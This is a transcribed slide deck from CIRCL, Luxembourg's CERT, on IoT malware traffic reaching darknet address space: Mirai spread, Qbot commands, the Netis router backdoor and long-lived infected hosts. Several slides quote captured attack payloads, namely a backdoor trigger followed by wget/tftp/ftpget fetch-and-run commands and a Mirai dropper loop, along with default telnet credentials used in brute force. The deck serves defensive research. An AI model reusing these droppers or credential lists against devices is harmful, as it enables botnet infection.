IoT dinosaurs - don t die out

Transcription

1 IoT dinosaurs - don t die out Data Science Luxembourg Gerard Wagener - TLP:WHITE CIRCL October 24, 2017

2 The Computer Incident Response Center Luxembourg (CIRCL) is a government-driven initiative designed to provide a systematic response facility to computer security threats and incidents. CIRCL is the CERT for the private sector, communes and non-governmental entities in Luxembourg. 2 of 23

3 Motivation and background IP darkspace or blackhole is Routable non-used address space of an ISP (Internet Service Provider), incoming traffic is unidirectional and unsolicited. Is there any traffic in those darkspaces? If yes, what and why does it arrive there? And on purpose or by mischance? What s the security impact? What are the security recommendations? 3 of 23

4 Collection and analysis framework 4 of 23

5 How does the data look like? 5 of 23

6 Raw data processing Avoid json exports such as provided by tshark 1 (ek option) or Moloch 2 Multiplies data volume up to 15 times On 2.18 TB compressed packet captures give 32 TB Avoid writing and reading from the same disk Keep raw data as long as possible of 23

7 Plotting TCP initial sequence numbers 7 of 23

8 Mirai case Discovering new devices 8 of 23

9 Mirai case 9 of 23

10 Mirai case Unique IP addresses Mirai behavior observed in blackhole networks isn=ip dest 09/01/16 11/01/16 01/01/17 03/01/17 05/01/17 07/01/17 09/01/17 day 10 of 23

11 Mirai case New forks Port 23 (TCP) and 2323 (TCP) evolution unique IP addresses 1.6x x x10 6 1x port 23 port 2323 port port 23 IP dest=isn day 11 of 23

12 IoT malware familes Linux.Darlloz (aka Zollard) Linux.Aidra / Linux.Lightaidra Linux.Xorddos (aka XOR.DDos) Linux.Ballpit (aka LizardStresser) Linux.Gafgyt (aka GayFgt, Bashlite) Linux.Moose Linux.Dofloo (aka AES.DDoS, Mr. Black) Linux.Pinscan / Linux.Pinscan.B (aka PNScan) Linux.Kaiten / Linux.Kaiten.B (aka Tsunami) Linux.Routrem (aka Remainten, KTN-Remastered, KTN-RM) Linux.Wifatch (aka Ifwatch) Linux.LuaBot Source: 12 of 23

13 Qbot Brute force attacks telnet accounts root admin user login guest support netgear cisco ubnt telnet Administrator comcast default password D-Link manager pi VTech vagrant Source: 13 of 23

14 Qbot Commands PING GETLOCALIP SCANNER ON, OFF JUNK HOLD UDP flood HTTP flood CNC KILLATTK GTFOFAG FATCOCK 14 of 23

15 Netcore/Netis routers backdoor exploits Backdoor reported by Trendmicro the 8th August Send UDP packet on port Payload must start with AA\0AAAA\0 followed with shell commands 4 Last observed packet Pushed malware Mirai 748ea07b cbf9c60934b43d82 Mirai variant? 3 netis-routers-leave-wide-open-backdoor/ of 23

16 Injected URLS in UDP payloads AA\x00\x00AAAA cd /tmp cd /var/run cd /mnt cd /root cd /; wget chmod 777 kanker; sh kanker; tftp xx.xx c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g xx.xx ; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 xx.xx ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf kanker tftp1.sh tftp2.sh ftp1.sh; rm -rf *\x00\n 16 of 23

17 Injected URLS in UDP payloads # Gucci Ares # Kik:XVPL IG:Greek.Ares #!/bin/sh # Edit WEBSERVER="xx.xx :80" # Stop editing now BINARIES="mirai.arm mirai.arm5n mirai.arm7 mirai.x68 mirai.x86 mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.spc" for Binary in $BINARIES; do cd /tmp; echo >DIRTEST cd /var; echo >DIRTEST ;wget -O dvrhelper chmod 777 dvrhelper./dvrhelper done 17 of 23

18 Injected URLS in UDP payloads Unique IP addresses Wget and urls observed in UDP payloads /01/15 07/01/15 01/01/16 day 07/01/16 01/01/17 07/01/17 18 of 23

19 Injected URLS in UDP payloads Unique IP addresses /01/ /01/16 12/01/16 01/01/17 Injected URLs in UDP payloads 02/01/17 03/01/17 04/01/17 day 05/01/17 06/01/17 07/01/17 unique urls 08/01/17 09/01/17 10/01/17 11/01/17 19 of 23

20 Machine cleanup is hard 4 years in the life of a printer from a series of packets hitting our darkspace 20 of 23

21 Machine cleanup is hard Misconfigured printer Number of messages /01/ /01/13 01/01/14 Syslog: printer activity (single source) 07/01/14 01/01/15 07/01/15 door open intervention req. paper jam toner low output full 01/01/16 07/01/16 01/01/17 07/01/17 21 of 23 date

22 Allaple worm 35 Allaple worm activity Unique IP addresses /01/15 04/01/15 07/01/15 10/01/15 01/01/16 04/01/16 07/01/16 Day 10/01/16 01/01/17 04/01/17 07/01/17 10/01/17 22 of 23

23 Commodity routers were already abused in 2014 They are still being abused Many variants are there MISP It usually takes a lot of time to get machines fixed Contact info@circl.lu 23 of 23